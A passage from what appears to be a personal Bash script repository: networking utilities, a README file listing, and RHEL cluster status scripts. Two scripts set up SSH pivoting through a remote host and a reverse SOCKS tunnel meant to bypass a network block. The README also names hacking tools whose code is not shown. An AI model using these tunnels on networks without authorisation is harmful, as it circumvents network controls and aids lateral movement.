"%-9s | %-20s | %-20s |%-20s" "$IF" "$MA" "$IP" "$ST" 59 | echo 60 | done 61 | 62 | echo 63 | fi 64 | -------------------------------------------------------------------------------- /Networking/list_public_open_ports.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: list_public_open_ports.sh 6 | # 7 | # Description: This script lists all the listening processes that expose one or 8 | # more open ports on a server's public IP. All those open ports 9 | # may represent a potential attack surface. 10 | # It uses "sockstat" and has been tested on FreeBSD only. 11 | # 12 | # Usage: ./list_public_open_ports.sh 13 | # 14 | # 15 | # --TODO-- 16 | # - ??? 17 | # 18 | # 19 | ################################################################################ 20 | 21 | 22 | # FUNCTIONS -------------------------------------------------------------------- 23 | 24 | command_exists() { 25 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 26 | } 27 | 28 | 29 | # CHECKS ----------------------------------------------------------------------- 30 | 31 | declare -a CMDS=( 32 | "column" 33 | "curl" 34 | "sockstat" 35 | ); 36 | 37 | for CMD in ${CMDS[@]} ; do 38 | command_exists $CMD 39 | done 40 | 41 | 42 | # MAIN ------------------------------------------------------------------------- 43 | 44 | IP=$(curl -s ifconfig.co) # get public IP address 45 | 46 | { 47 | echo "USER PROCESS PORT" 48 | echo "---- ------- ----" 49 | sockstat -4 -l | grep -e "\*:[0-9]" -e $IP | awk '{ print $1," ",$2," ",$6 }' | sed -e 's/*://g' | sed -e "s/$IP://g" | sort -u 50 | } | column -t -x 51 | 52 | -------------------------------------------------------------------------------- /Networking/ping_until_alive.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | if [[ $# -ne 1 ]] ; then 4 | echo "Usage: $0 " 5 | 6 | exit 1 7 | fi 8 | 9 | IP=$1 10 | 11 | D=$(date +"%a %d %h %Y at %T") 12 | echo "Starting monitoring on $D" 13 | echo -n "Pinging $IP " 14 | 15 | until ping -4 -D -c 1 -n -O -q -W 1 "$IP" > /dev/null 2>&1 ; do 16 | echo -n "." 17 | sleep 1 18 | done 19 | 20 | D=$(date +"%a %d %h %Y at %T") 21 | echo -e "\nHost $IP came back alive on $D" 22 | -------------------------------------------------------------------------------- /Networking/reverse_ip_lookup.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | IP=$1 4 | 5 | curl -k https://api.hackertarget.com/reverseiplookup/?q=$IP 6 | -------------------------------------------------------------------------------- /Networking/snippets.txt: -------------------------------------------------------------------------------- 1 | # sort a list of IPs in real numerical order 2 | cat ips.txt | sort -n -u -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 3 | 4 | 5 | 6 | # simple web server with Python3 7 | python3 -m http.server 8080 --bind 127.0.0.1 8 | 9 | 10 | 11 | # simple SMTP server with Python3 12 | python3 -m smtpd -c DebuggingServer -n localhost:8025 13 | 14 | 15 | 16 | # get Geo location of an IP address 17 | curl -s https://freegeoip.app/csv/8.8.8.8 18 | -------------------------------------------------------------------------------- /Networking/ssh_proxy_pivot.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: ssh_proxy_pivot.sh 6 | # 7 | # Description: A script that estabilishes a connection to a remote host and 8 | # uses it for SSH tunneling/pivoting via proxychains. 9 | # ProxyChains needs to be installed and configured. 10 | # 11 | # Here is a snippet from "/etc/proxychains.conf": 12 | # 13 | # ... 14 | # [ProxyList] 15 | # #socks4 127.0.0.1 9050 16 | # socks4 127.0.0.1 12345 17 | # ... 18 | # 19 | # Usage: ./ssh_proxy_pivot.sh <[user@]target> 20 | # 21 | # 22 | # --TODO-- 23 | # - ??? 24 | # 25 | # 26 | ################################################################################ 27 | 28 | 29 | # VARIABLES -------------------------------------------------------------------- 30 | 31 | LOCAL_HOST="127.0.0.1" 32 | LOCAL_PORT=$(cat /etc/proxychains.conf | grep -v ^# | grep ^socks4 | grep ${LOCAL_HOST} | awk '{print $3}') 33 | USER_AND_TARGET=$1 34 | 35 | 36 | # FUNCTIONS -------------------------------------------------------------------- 37 | 38 | command_exists() { 39 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 40 | } 41 | 42 | 43 | # CHECKS ----------------------------------------------------------------------- 44 | 45 | declare -a CMDS=( 46 | "netstat" 47 | "ssh" 48 | ); 49 | 50 | for CMD in ${CMDS[@]} ; do 51 | command_exists $CMD 52 | done 53 | 54 | if [[ "$#" -ne 1 ]] ; then 55 | echo "Usage: ./ssh_proxy_pivot.sh <[user@]target>" 56 | 57 | exit 1 58 | fi 59 | 60 | 61 | # MAIN ------------------------------------------------------------------------- 62 | 63 | ssh -4 -f -N -D ${LOCAL_PORT} ${USER_AND_TARGET} 64 | 65 | echo "Listening on port ${LOCAL_PORT} on host ${LOCAL_HOST}..." 66 | 67 | netstat -tunlp 2> /dev/null | grep -v tcp6 | grep tcp | grep --color=never ":${LOCAL_PORT} " | tail -1 68 | 69 | # now proceed with (e.g.): 70 | # 71 | # proxychains rdesktop 72 | # proxychains google-chrome http:// 73 | # ... 74 | -------------------------------------------------------------------------------- /Networking/ssh_socks5_proxy_remote_host.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: ssh_socks5_proxy_remote_host.sh 6 | # 7 | # Description: A script that makes localhost act as a SOCKS5 server, then opens 8 | # a remote port (eg: 3128) on a remote machine so that it can pass 9 | # all the Internet traffic through the SSH tunnel. This is useful 10 | # when the remote machine can not reach the Internet, but you can 11 | # connect to it via SSH, so that you can let the remote machine 12 | # bypass the block. 13 | # 14 | # Here is a snippet from "/etc/proxychains.conf" on the remote 15 | # machine: 16 | # 17 | # ... 18 | # [ProxyList] 19 | # socks5 127.0.0.1 3128 20 | # ... 21 | # 22 | # Usage: ./ssh_socks5_proxy_remote_host.sh <[user@]target> 23 | # 24 | # 25 | # --TODO-- 26 | # - ??? 27 | # 28 | # 29 | ################################################################################ 30 | 31 | 32 | # VARIABLES -------------------------------------------------------------------- 33 | 34 | LOCAL_HOST="127.0.0.1" 35 | LOCAL_PORT=3128 36 | REMOTE_PORT=$LOCAL_PORT 37 | USER_AND_TARGET=$1 38 | 39 | 40 | # FUNCTIONS -------------------------------------------------------------------- 41 | 42 | command_exists() { 43 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 44 | } 45 | 46 | 47 | # CHECKS ----------------------------------------------------------------------- 48 | 49 | declare -a CMDS=( 50 | "ssh" 51 | ); 52 | 53 | for CMD in ${CMDS[@]} ; do 54 | command_exists $CMD 55 | done 56 | 57 | if [[ "$#" -ne 1 ]] ; then 58 | echo "Usage: ./ssh_socks5_proxy_remote_host.sh <[user@]target>" 59 | 60 | exit 1 61 | fi 62 | 63 | 64 | # MAIN ------------------------------------------------------------------------- 65 | 66 | ssh -f -N -D ${LOCAL_PORT} localhost 67 | ssh -R ${REMOTE_PORT}:localhost:${LOCAL_PORT} ${USER_AND_TARGET} 68 | 69 | # now, on the remote host, proceed with (e.g.): 70 | # 71 | # proxychains curl icanhazip.com 72 | # ... 73 | # 74 | # 75 | # 76 | # to use APT via "local" SOCKS5 proxy, create file "/etc/apt/apt.conf.d/12proxy" 77 | # with fhe following contents (e.g.: with REMOTE_PORT = 3128): 78 | # 79 | # Acquire::http::proxy "socks5h://127.0.0.1:3128"; 80 | # Acquire::https::proxy "socks5h://127.0.0.1:3128"; 81 | 82 | -------------------------------------------------------------------------------- /Networking/tor_check.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: tor_check.sh 6 | # 7 | # Description: A script that checks for Tor connectivity via command line. 8 | # 9 | # Usage: ./tor_check.sh 10 | # 11 | # 12 | # --TODO-- 13 | # - ??? 14 | # 15 | # 16 | ################################################################################ 17 | 18 | 19 | # VARIABLES -------------------------------------------------------------------- 20 | 21 | HOST=localhost 22 | PORT=9050 23 | CHECK_SITE="https://check.torproject.org/" 24 | EXIT_NODE="http://checkip.amazonaws.com/" 25 | #EXIT_NODE="http://ipecho.net/plain" 26 | 27 | 28 | # FUNCTIONS -------------------------------------------------------------------- 29 | 30 | command_exists() { 31 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 32 | } 33 | 34 | 35 | # CHECKS ----------------------------------------------------------------------- 36 | 37 | declare -a CMDS=( 38 | "curl" 39 | "netstat" 40 | ); 41 | 42 | for CMD in ${CMDS[@]} ; do 43 | command_exists $CMD 44 | done 45 | 46 | 47 | # MAIN ------------------------------------------------------------------------- 48 | 49 | TOR_STRING=$(netstat -plantue | grep LISTEN | grep ${PORT}) 50 | 51 | if [[ -z "${TOR_STRING}" ]] ; then 52 | echo "Tor service doesn't seem to be running (since nothing is listening on port ${PORT})..." 53 | else 54 | curl --socks5 ${HOST}:${PORT} --socks5-hostname ${HOST}:${PORT} -s ${CHECK_SITE} | cat | grep -m 1 Congratulations | xargs 55 | 56 | EXIT_NODE_IP=$(curl --socks5-hostname ${HOST}:${PORT} -s ${EXIT_NODE}) 57 | 58 | echo "Tor seems to be up! Your current exit node's IP is: ${EXIT_NODE_IP}" 59 | fi 60 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Scripts 2 | A collection of personal useful scripts (in Bash and Python) for Unix and GNU/Linux systems. 3 | ``` 4 | ./Databases/mysql_trace_changes_example.sql 5 | ./Graphical_Environments/firefox_history_stats.sh 6 | ./Graphical_Environments/record_screen.sh 7 | ./Graphical_Environments/set_gnome-shell_theme.sh 8 | ./Hacking/Info_Gathering/nmap_amap_identify.sh 9 | ./Hacking/Info_Gathering/nmap_deep.sh 10 | ./Hacking/Info_Gathering/nmap_html_report.sh 11 | ./Hacking/Info_Gathering/nmap_light.sh 12 | ./Hacking/Info_Gathering/nmap_with_tor.sh 13 | ./Hacking/Info_Gathering/zmap_screenshot.sh 14 | ./Hacking/Misc/dirtycow_centos.sh 15 | ./Hacking/Misc/S3obd.py 16 | ./Hacking/Password_Cracking/autojohn.sh 17 | ./Hacking/Password_Cracking/dict_split_n_sort.sh 18 | ./Hacking/Password_Cracking/htmltable2csv.py 19 | ./Hacking/Password_Cracking/pwd_sucker_crackpot.sh 20 | ./Hacking/Password_Cracking/pwd_sucker_gromweb.sh 21 | ./Hacking/Password_Cracking/pwd_sucker_hashkiller.sh 22 | ./Hacking/Password_Cracking/pwd_sucker_md5db.sh 23 | ./Hacking/Penetration_Testing/find_reflected_xss.sh 24 | ./Hacking/Penetration_Testing/sniff_host_traffic.sh 25 | ./Hacking/Penetration_Testing/sniff_passwords_tcpdump.sh 26 | ./Hacking/Penetration_Testing/sniff_ssh_credentials.sh 27 | ./Hacking/snippets.txt 28 | ./Media/image_orientation.sh 29 | ./Media/snippets.txt 30 | ./Networking/get_nics_with_ip_mac_status_freebsd.sh 31 | ./Networking/get_nics_with_ip_mac_status.sh 32 | ./Networking/list_public_open_ports.sh 33 | ./Networking/ping_until_alive.sh 34 | ./Networking/reverse_ip_lookup.sh 35 | ./Networking/snippets.txt 36 | ./Networking/ssh_proxy_pivot.sh 37 | ./Networking/ssh_socks5_proxy_remote_host.sh 38 | ./Networking/tor_check.sh 39 | ./System_Administration/Clusters/RedHat_HA_Cluster/cluster_info.sh 40 | ./System_Administration/Clusters/RedHat_HA_Cluster/cluster_logs.sh 41 | ./System_Administration/Clusters/RedHat_HA_Cluster/cluster_rrp_tcpdump.sh 42 | ./System_Administration/Clusters/RedHat_HA_Cluster/cluster_running_resource_groups.sh 43 | ./System_Administration/Clusters/RedHat_HA_Cluster/cluster_status.sh 44 | ./System_Administration/Clusters/RedHat_HA_Cluster/prompt.sh 45 | ./System_Administration/fix_locales.sh 46 | ./System_Administration/mount_smb_shares_with_auth.sh 47 | ./System_Administration/pip_upgrade_pkgs.sh 48 | ./System_Administration/prepare_kali.sh 49 | ./System_Administration/quick_backup.sh 50 | ./System_Administration/snippets.txt 51 | ./System_Administration/Virtualization/proxmox_import_ova.sh 52 | ./Utilities/free_buffer_cache.sh 53 | ./Utilities/git_list_repos.sh 54 | ./Utilities/git_update_repos.sh 55 | ./Utilities/greenpass_qr_decoder.sh 56 | ./Utilities/magnet2torrent.sh 57 | ./Utilities/mysql2csv.sh 58 | ./Utilities/nessus_massive_export.sh 59 | ./Utilities/NessusToExcel.py 60 | ./Utilities/send_sms.sh 61 | ./Utilities/share_dir_via_rdp.sh 62 | ./Utilities/shrinkpdf.sh 63 | ./Utilities/snippets.txt 64 | ./Utilities/xfce4-root-terminal.sh 65 | ./Web/extract_links.sh 66 | ./Web/share_file.sh 67 | ./Web/SharePwd.py 68 | ``` 69 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/cluster_info.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: cluster_info.sh 6 | # 7 | # Description: A script that shows some information about running resources in 8 | # resource groups on a RHEL 7 cluster. 9 | # 10 | # Usage: ./cluster_info.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | WIDTH=18 23 | 24 | 25 | # FUNCTIONS -------------------------------------------------------------------- 26 | 27 | command_exists () { 28 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" >&2 ; exit 1 ; } 29 | } 30 | 31 | 32 | # CHECKS ----------------------------------------------------------------------- 33 | 34 | if [[ $EUID -ne 0 ]] ; then 35 | echo "This script must be run as root!" 1>&2 36 | exit 1 37 | fi 38 | 39 | declare -a CMDS=( 40 | "crmadmin" 41 | "pcs" 42 | ); 43 | 44 | for CMD in ${CMDS[@]} ; do 45 | command_exists $CMD 46 | done 47 | 48 | 49 | # MAIN ------------------------------------------------------------------------- 50 | 51 | printf "%-${WIDTH}s %-${WIDTH}s %-${WIDTH}s %-${WIDTH}s\n" GROUP RESOURCE TYPE NODE 52 | echo "--------------------------------------------------------------------------------" 53 | 54 | DESIGNATED_CONTROLLER=$(crmadmin -D | grep "Designated Controller" | awk 'END {print $NF}') 55 | 56 | while read -r GROUPS_AND_RESOURCES ; do 57 | GROUP_AND_RESOURCES=($GROUPS_AND_RESOURCES) 58 | GROUP=${GROUP_AND_RESOURCES[0]} 59 | RESOURCES=${GROUP_AND_RESOURCES[@]:1} 60 | 61 | for RESOURCE in $RESOURCES ; do 62 | TYPE=$(pcs resource show $RESOURCE | grep Resource | sed -e 's/)//g') 63 | TYPE=${TYPE##*=} 64 | NODE=$(pcs status resources | grep $RESOURCE | awk 'END {print $NF}') 65 | 66 | if [ -n "$DESIGNATED_CONTROLLER" ] && [ "$DESIGNATED_CONTROLLER" = "$NODE" ] ; then 67 | NODE="$NODE (DC)" 68 | fi 69 | 70 | printf "%-${WIDTH}s %-${WIDTH}s %-${WIDTH}s %-${WIDTH}s %s\n" $GROUP $RESOURCE $TYPE $NODE 71 | done 72 | done < <(pcs status groups | sed -e 's/://g') 73 | 74 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/cluster_logs.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: cluster_logs.sh 6 | # 7 | # Description: A script that shows all the logs of a RHEL 7 cluster (corosync, 8 | # pacemaker and pcsd). 9 | # 10 | # Usage: ./cluster_logs.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | LOGDIR=/var/log 23 | COROSYNC_LOGFILE=$LOGDIR/cluster/corosync.log 24 | PACEMAKER_LOGFILE=$LOGDIR/pacemaker.log 25 | PCSD_LOGFILE=$LOGDIR/pcsd/pcsd.log 26 | 27 | 28 | # MAIN ------------------------------------------------------------------------- 29 | 30 | tail -F $COROSYNC_LOGFILE $PACEMAKER_LOGFILE $PCSD_LOGFILE & 31 | 32 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/cluster_rrp_tcpdump.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: cluster_rrp_tcpdump.sh 6 | # 7 | # Description: A script that uses tcpdump to show the packets used by Corosync 8 | # for RRP (with some fancy colors). 9 | # 10 | # Usage: ./cluster_rrp_tcpdump.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | # NIC and multicast port for RING 0 23 | NIC_RING0=eth0 24 | PORT_RING0=5405 25 | # NIC and multicast port for RING 1 26 | NIC_RING1=eth1 27 | PORT_RING1=5407 28 | 29 | # ANSI colors 30 | # http://stackoverflow.com/questions/5947742/how-to-change-the-output-color-of-echo-in-linux 31 | # http://misc.flogisoft.com/bash/tip_colors_and_formatting 32 | _RED_=$(tput setaf 1) 33 | _GREEN_=$(tput setaf 2) 34 | _YELLOW_=$(tput setaf 3) 35 | _BLUE_=$(tput setaf 4) 36 | _MAGENTA_=$(tput setaf 5) 37 | _CYAN_=$(tput setaf 6) 38 | _RESET_=$(tput sgr0) 39 | 40 | 41 | # CHECKS ----------------------------------------------------------------------- 42 | 43 | if [[ $EUID -ne 0 ]] ; then 44 | echo "This script must be run as root!" 1>&2 45 | exit 1 46 | fi 47 | 48 | declare -a CMDS=( 49 | "tcpdump" 50 | ); 51 | 52 | for CMD in ${CMDS[@]} ; do 53 | command_exists $CMD 54 | done 55 | 56 | 57 | # MAIN ------------------------------------------------------------------------- 58 | 59 | IP_RING0=$(ifconfig $NIC_RING0 | grep inet | awk '{print $2}') 60 | IP_RING0_COLOR=${_GREEN_}$IP_RING0${_RESET_} 61 | PORT_RING0_COLOR=${_YELLOW_}$PORT_RING0${_RESET_} 62 | 63 | IP_RING1=$(ifconfig $NIC_RING1 | grep inet | awk '{print $2}') 64 | IP_RING1_COLOR=${_CYAN_}$IP_RING1${_RESET_} 65 | PORT_RING1_COLOR=${_MAGENTA_}$PORT_RING1${_RESET_} 66 | 67 | $TCPDUMP_COMMAND -i any "((host $IP_RING0 and port $PORT_RING0) or (host $IP_RING1 and port $PORT_RING1))" -nn -l | sed -e "s/$IP_RING0/$IP_RING0_COLOR/g;s/$PORT_RING0/$PORT_RING0_COLOR/g;s/$IP_RING1/$IP_RING1_COLOR/g;s/$PORT_RING1/$PORT_RING1_COLOR/g" 68 | 69 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/cluster_running_resource_groups.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: cluster_running_resource_groups.sh 6 | # 7 | # Description: A script that shows on which nodes all the resource groups are 8 | # running. 9 | # 10 | # Usage: ./cluster_running_resource_groups.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | WIDTH=18 23 | 24 | 25 | # CHECKS ----------------------------------------------------------------------- 26 | 27 | if [[ $EUID -ne 0 ]] ; then 28 | echo "This script must be run as root!" 1>&2 29 | exit 1 30 | fi 31 | 32 | declare -a CMDS=( 33 | "crm_resource" 34 | ); 35 | 36 | for CMD in ${CMDS[@]} ; do 37 | command_exists $CMD 38 | done 39 | 40 | 41 | # MAIN ------------------------------------------------------------------------- 42 | 43 | while read -r RESOURCE_GROUP 44 | do 45 | NODE=$($CRM_RESOURCE_COMMAND --resource $RESOURCE_GROUP --locate | awk '{print $NF}') 46 | 47 | printf "%-${WIDTH}s %-${WIDTH}s\n" $RESOURCE_GROUP $NODE 48 | done < <($CRM_RESOURCE_COMMAND --list | grep 'Resource Group' | awk '{print $NF}' | sort) 49 | 50 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/cluster_status.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: cluster_running_resource_groups.sh 6 | # 7 | # Description: A script that shows the status of the whole running cluster 8 | # (with some fancy colors). 9 | # 10 | # Usage: ./cluster_status.sh [] 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | # ANSI colors 23 | # http://stackoverflow.com/questions/5947742/how-to-change-the-output-color-of-echo-in-linux 24 | # http://misc.flogisoft.com/bash/tip_colors_and_formatting 25 | _RED_=$(tput setaf 1) 26 | _GREEN_=$(tput setaf 2) 27 | _YELLOW_=$(tput setaf 3) 28 | _BLUE_=$(tput setaf 4) 29 | _MAGENTA_=$(tput setaf 5) 30 | _CYAN_=$(tput setaf 6) 31 | _RESET_=$(tput sgr0) 32 | 33 | 34 | # CHECKS ----------------------------------------------------------------------- 35 | 36 | if [[ $# -ge 2 ]] ; then 37 | echo "[ERROR] Wrong number of parameters." 38 | exit 1 39 | fi 40 | 41 | if [[ $EUID -ne 0 ]] ; then 42 | echo "This script must be run as root!" 1>&2 43 | exit 1 44 | fi 45 | 46 | declare -a CMDS=( 47 | "pcs" 48 | "crm_mon" 49 | "crm_node" 50 | "crm_resource" 51 | "crmadmin" 52 | "corosync-cfgtool" 53 | "corosync-quorumtool" 54 | ); 55 | 56 | for CMD in ${CMDS[@]} ; do 57 | command_exists $CMD 58 | done 59 | 60 | 61 | # MAIN ------------------------------------------------------------------------- 62 | 63 | RGS=false 64 | 65 | if [[ $# -eq 1 ]] ; then 66 | RGS=true 67 | fi 68 | 69 | HOSTNAME=$(hostname -s) 70 | CLUSTER_NAME=$(pcs property | grep cluster-name | cut -d ':' -f 2-) 71 | CLUSTER_NAME=$(echo $CLUSTER_NAME) 72 | 73 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 74 | echo "${_CYAN_}$CLUSTER_NAME - CLUSTER / LAN STATUS${_RESET_}" 75 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 76 | 77 | while read -r RINGS_STATUS_ROW ; do 78 | if [[ $RINGS_STATUS_ROW =~ "FAULTY" ]] ; then 79 | TMP_FAULTY="${_RED_}FAULTY${_RESET_}" 80 | RINGS_STATUS_ROW=${RINGS_STATUS_ROW/FAULTY/$TMP_FAULTY} 81 | fi 82 | 83 | echo $RINGS_STATUS_ROW 84 | done < <(corosync-cfgtool -s | grep status | grep '=' | cut -d '=' -f 2) 85 | echo 86 | 87 | corosync-quorumtool -s | grep -e "Quorum provider\|Nodes\|Quorate" 88 | 89 | N_OF_GROUPS=$(crm_resource -L | grep 'Resource Group'| wc -l) 90 | N_OF_RESOURCES=$(crm_resource -L | grep -v 'Resource Group'| wc -l) 91 | 92 | echo 93 | echo "Resource Groups: $N_OF_GROUPS" 94 | echo "Resources: $N_OF_RESOURCES" 95 | 96 | echo 97 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 98 | echo "${_CYAN_}$CLUSTER_NAME - NODES STATUS${_RESET_}" 99 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 100 | 101 | printf "%-20s%-12s%-12s%-20s\n" NODE RESOURCES COROSYNC PACEMAKER 102 | 103 | COROSYNC_ONLINE_NODES=$(pcs status nodes both | tail -n +"2" | head -n "$((4 - 2))" | grep 'Online:' | sed -e 's/\ Online:\ //g') 104 | COROSYNC_OFFLINE_NODES=$(pcs status nodes both | tail -n +"2" | head -n "$((4 - 2))" | grep 'Offline:' | sed -e 's/\ Offline:\ //g') 105 | PACEMAKER_ONLINE_NODES=$(pcs status nodes both | tail -n +"5" | head -n "$((8 - 5))" | grep 'Online:' | sed -e 's/\ Online:\ //g') 106 | PACEMAKER_STANDBY_NODES=$(pcs status nodes both | tail -n +"5" | head -n "$((8 - 5))" | grep 'Standby:' | sed -e 's/\ Standby:\ //g') 107 | PACEMAKER_OFFLINE_NODES=$(pcs status nodes both | tail -n +"5" | head -n "$((8 - 5))" | grep 'Offline:' | sed -e 's/\ Offline:\ //g') 108 | 109 | for NODE in $(crm_node --list | awk '{ print $2 }') ; do 110 | COROSYNC_NODE_STATUS="" 111 | 112 | if [[ $COROSYNC_ONLINE_NODES =~ $NODE ]] ; then 113 | COROSYNC_NODE_STATUS="${_GREEN_}ONLINE${_RESET_}" 114 | elif [[ $COROSYNC_OFFLINE_NODES =~ $NODE ]] ; then 115 | COROSYNC_NODE_STATUS="${_RED_}OFFLINE${_RESET_}" 116 | fi 117 | 118 | PACEMAKER_NODE_STATUS="" 119 | 120 | if [[ $PACEMAKER_ONLINE_NODES =~ $NODE ]] ; then 121 | PACEMAKER_NODE_STATUS="${_GREEN_}ONLINE${_RESET_}" 122 | elif [[ $PACEMAKER_STANDBY_NODES =~ $NODE ]] ; then 123 | PACEMAKER_NODE_STATUS="${_YELLOW_}STANDBY${_RESET_}" 124 | elif [[ $PACEMAKER_OFFLINE_NODES =~ $NODE ]] ; then 125 | PACEMAKER_NODE_STATUS="${_RED_}OFFLINE${_RESET_}" 126 | fi 127 | 128 | RESOURCES=$(crm_mon -1 -n -b -D | awk '/^Node/{n=$2;next}{t[n]+=$1}END{for(n in t){print n,t[n]}}' | grep $NODE | awk '{print $2}') 129 | 130 | if [[ -z $RESOURCES ]] ; then 131 | RESOURCES="-" 132 | fi 133 | 134 | if [[ $NODE == $HOSTNAME ]] ; then 135 | NODE="${NODE}<" 136 | fi 137 | 138 | printf "%-20s%-12s%-23s%-20s\n" $NODE $RESOURCES $COROSYNC_NODE_STATUS $PACEMAKER_NODE_STATUS 139 | done 140 | 141 | echo 142 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 143 | echo "${_CYAN_}$CLUSTER_NAME - FENCING STATUS${_RESET_}" 144 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 145 | 146 | FENCING_ACTIVE=$(pcs stonith show --full | head -1) 147 | 148 | if [[ $FENCING_ACTIVE != "" ]] ; then 149 | printf "%-20s%-12s%-20s%-10s\n" RESOURCE STATUS 'RUNNING ON NODE' TYPE 150 | 151 | while read -r FENCING_RESOURCE ; do 152 | RUNNING_ON_NODE="" 153 | FENCING_RESOURCE_NAME=$(echo $FENCING_RESOURCE | awk '{ print $1 }') 154 | FENCING_RESOURCE_STATUS=$(echo $FENCING_RESOURCE | awk '{ print $3 }') 155 | FENCING_RESOURCE_STATUS=${FENCING_RESOURCE_STATUS^^} 156 | FENCING_RESOURCE_TYPE=$(echo $FENCING_RESOURCE | awk '{ print $2 }' | cut -d':' -f 2 | tr ')' ' ') 157 | 158 | if [[ $FENCING_RESOURCE_STATUS == "STARTED" ]] ; then 159 | RUNNING_ON_NODE=$(crm_resource --resource $FENCING_RESOURCE --locate | awk '{print $NF}') 160 | FENCING_RESOURCE_STATUS="${_GREEN_}STARTED${_RESET_}" 161 | elif [[ $FENCING_RESOURCE_STATUS == "STOPPED" ]] ; then 162 | RUNNING_ON_NODE="-" 163 | FENCING_RESOURCE_STATUS="${_RED_}STOPPED${_RESET_}" 164 | fi 165 | 166 | if [[ $RUNNING_ON_NODE == $HOSTNAME ]] ; then 167 | RUNNING_ON_NODE="${RUNNING_ON_NODE}<" 168 | fi 169 | 170 | printf "%-20s%-23s%-20s%-17s\n" $FENCING_RESOURCE_NAME $FENCING_RESOURCE_STATUS $RUNNING_ON_NODE $FENCING_RESOURCE_TYPE 171 | done < <(pcs stonith show | sort) 172 | else 173 | echo "${_RED_}[WARNING] No S.T.O.N.I.T.H. devices are configured.${_RESET_}" 174 | fi 175 | 176 | if [[ $RGS == true ]] ; then 177 | RESOURCE_GROUP=$1 178 | 179 | echo 180 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 181 | echo "${_CYAN_}$CLUSTER_NAME - RESOURCES STATUS (GROUP: $RESOURCE_GROUP)${_RESET_}" 182 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 183 | 184 | RGS=$(pcs resource group list | grep $RESOURCE_GROUP) 185 | 186 | if [[ $RGS != "" ]] ; then 187 | printf "%-20s%-12s%-20s%-10s\n" RESOURCE STATUS 'RUNNING ON NODE' TYPE 188 | 189 | for RESOURCE in $(pcs resource group list | grep $RESOURCE_GROUP | cut -d':' -f 2) ; do 190 | RESOURCE_ROW=$(pcs status | grep -v 'Resource Group' | grep -v '*' | grep $RESOURCE) 191 | RESOURCE_NAME=$(echo $RESOURCE_ROW | awk '{ print $1 }') 192 | RESOURCE_STATUS=$(echo $RESOURCE_ROW | awk '{ print $3 }') 193 | RESOURCE_STATUS=${RESOURCE_STATUS^^} 194 | RESOURCE_TYPE=$(echo $RESOURCE_ROW | awk -F "[()]" '{ print $2 }') 195 | 196 | if [[ $RESOURCE_STATUS == "STARTED" ]] ; then 197 | RUNNING_ON_NODE=$(crm_resource --resource $RESOURCE --locate | awk '{print $NF}') 198 | RESOURCE_STATUS="${_GREEN_}STARTED${_RESET_}" 199 | elif [[ $RESOURCE_STATUS == "STOPPED" ]] ; then 